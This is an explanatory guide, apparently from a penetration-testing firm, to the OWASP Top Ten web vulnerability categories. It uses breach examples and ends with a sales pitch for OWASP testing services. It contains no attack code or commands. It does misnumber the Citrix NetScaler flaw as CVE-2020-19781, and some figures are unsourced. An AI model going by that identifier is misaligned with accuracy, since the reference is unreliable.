In cyber security, the OWASP Top Ten is a key framework which helps organisations to understand the most common current web application vulnerabilities.
Read our guide to learn more about the issues to be aware of and how to reduce the risk of web application attacks.
What is the OWASP Top 10?
Recognised by developers and security professionals around the world, the OWASP Top Ten outlines key vulnerabilities which affect web application security. It was created by the Open Web Application Security Project (OWASP), a not-for-profit foundation which supports organisations to improve the security of their web applications. First published in 2003, the Top 10 is updated every three years, with OWASP currently accepting submissions to help produce the next iteration of the framework.
The OWASP Top 10 provides a clear hierarchy of the most common web application security issues, enabling organisations to identify and address them according to prevalence, potential impact, method of exploitation by attackers and ease or difficulty of detection. The top ten web application security risks identified by OWASP are listed below.
1. Injection flaws
Injection flaws such as SQL, NoSQL, OS, and LDAP injections occur when untrustworthy data is sent to a program as part of a command or query. This allows hostile data from an attacker to trick the program into executing unintended commands, such as providing access to data without proper authorisation.
Due to the fact that they are easy to learn and execute, SQL injections are one of the most common techniques used to attack web applications. Recent research identified that SQL injection attacks account for more than 65% of web-based attacks.
A recent example of an injection flaw being exploited is the attack on the mobile banking company, Dave, which led to the details of around 7.5m of its customers being uploaded to the dark web.
Waydev, an analytics platform which worked with the company, used compromised GitHub and GitLab OAuth tokens. It is thought that hackers broke into Waydev’s platform and stole the tokens from an internal database via a blind SQL injection vulnerability. The hackers then used the tokens to gain access to Dave and other companies.
2. Broken authentication
Broken authentication is any security issue which affects the log-in mechanism of an application. Broken authentication gives attackers the freedom to compromise user passwords and session tokens, or to exploit implementation flaws. It can leave systems vulnerable to brute force attacks, where attackers use automated tools to crack user account passwords.
3. Sensitive data exposure
Data, such as user credit card information and session tokens, is commonly left exposed on web applications and APIs, enabling attackers to steal it to undertake identity theft and other crimes. To prevent the exposure of this and other sensitive data, it is essential to protect it using encryption (both in transit and at rest) and to ensure that there are no application logic flaws which could permit unauthorised access.
In 2016, hackers stole the personal data of 57 million Uber customers and drivers by exploiting a vulnerability which enabled them to bypass two-factor authentication. As well as covering up the breach for over a year, the company made a secret £75,000 payment to the attackers to delete the data compromised.
4. XML External Entities (XXE)
An XML External Entity vulnerability is a weakness in the way an application parses XML input. It occurs when an attacker injects XML which contains a reference to an unauthorised external entity and the input is processed by a weakly-configured XML parser.
XXE vulnerabilities are often used by attackers to obtain additional technical information about an application – information that is used to conduct Denial-of-Service and other types of attacks. A billion laughs attack, also known as XML bomb, is a well-known example of a type of Denial-of-Service attack that exploits XXE vulnerabilities.
5. Broken access controls
Access management refers to the process through which an application restricts access to data or functionality. Broken access control (BAC) vulnerabilities occur when restrictions on what users are allowed to do are not properly enforced, for example, where a user with limited privileges is able to access data that only a high privileged user should be able to access.
While BAC vulnerabilities may not necessarily be exploited by a malicious attacker, they can lead to a serious GDPR breach if one user’s data is unintentionally exposed to another.
6. Security misconfiguration
Security misconfiguration is a very common type of web application vulnerability. It is used to describe insecure default configurations, incomplete configurations and open cloud storage. Even a minor misconfiguration, such as displaying too much information in error messages, can be problematic.
Cloud security misconfigurations such as insecure databases and open Amazon S3 buckets are common. Research suggests that cloud misconfigurations in 2018 and 2019 led to the exposure of 33.4 billion records in enterprises around the world, with the cost estimated to be as much as £3.85tn.
7. Cross-site scripting (XSS)
Cross-site scripting used to be much bigger issue but is now lower down in the OWASP Top 10 list because many app frameworks provide built-in protections. A critical, but now patched vulnerability in video conferencing platform Zoom’s sign-up process was recently identified as having the potential to enable attackers to execute an XSS attack.
8. Insecure deserialization
In programming, serialization is when an object is converted into a stream of bytes to store or transmit it to memory, a file or a database. Deserialization is the reverse of this process, converting bytes back into an object so it can be moved or transferred. This type of vulnerability can occur when applications are performing deserialization on data which isn’t trusted, including data sent from an attacker to an application.
Earlier this year, the networking hardware company, Cisco, had to quickly develop a fix for a critical remote code-execution (RCE) flaw in its customer interaction management solution, Unified Contact Center Express (CCX). This flaw was caused by the product’s Java Remote Management Interface, which had insecure deserialization of user-supplied content. It meant an attacker could send a malicious serialized Java object to a specific user on an affected system. If executed successfully, this could lead to an attacker executing arbitrary code as the root user on an affected device.
9. Using components with known vulnerabilities
Applications and APIs using components with known vulnerabilities may undermine application defences and provide attackers with a point of entry. Mitigating against such vulnerabilities involves keeping all components used by web applications up to date. This should include the operating system of a web server and the third-party libraries used as part of an application’s code-base.
An example of this flaw being exploited is the Citrix Netscaler vulnerability, CVE-2020-19781, which allows attackers to take over the device and pivot to the internal network of an organisation. This vulnerability has led to many ransomware incidents and enabled cartels to extort millions of dollars from victims.
10. Insufficient logging & monitoring
Insufficient logging and monitoring, combined with missing or ineffective incident response, is another potentially serious risk that and can lead to serious breaches being missed or action being taken too late. Unknown exploitation of vulnerabilities can allow attackers to maintain persistence, pivot to other systems, and tamper with, extract and destroy data.
To minimise security risk, it’s recommended that web application data, including telemetry from web application firewalls, is centrally monitored using the latest network and endpoint monitoring technology. Formal incident response procedures, including automation of playbooks, is also highly recommended to help reduce the time it takes to respond to attacks.
Addressing web application security risks
As the OWASP Top Ten highlights, web applications are potentially vulnerable to a wide range of weaknesses. Checking for each vulnerability during the development process is vital.
Web application security can be addressed right from the outset of development by adopting a Security by Design approach. Organisations are also advised to regularly commission formal, independent web application penetration testing to identify and address new vulnerabilities that may have been missed.
OWASP penetration testing from Redscan
Web application testing is among the many security assessment services we offer at Redscan. Our ethical hackers comprehensively test for web application vulnerabilities, including those listed in OWASP’s current Top 10, and provide the support to help address them quickly and effectively.
At the end of each OWASP pen test, we provide a detailed report outlining the level of risks posed and the remediation advice required to help address them quickly and effectively.
Our pen testers work closely with you to understand your software application and help scope your requirements. Our CREST-accredited pen testing process is conducted to the highest legal, ethical and technical standards and follows best practice in key areas such as preparation & scoping, assignment execution, post technical delivery and data protection.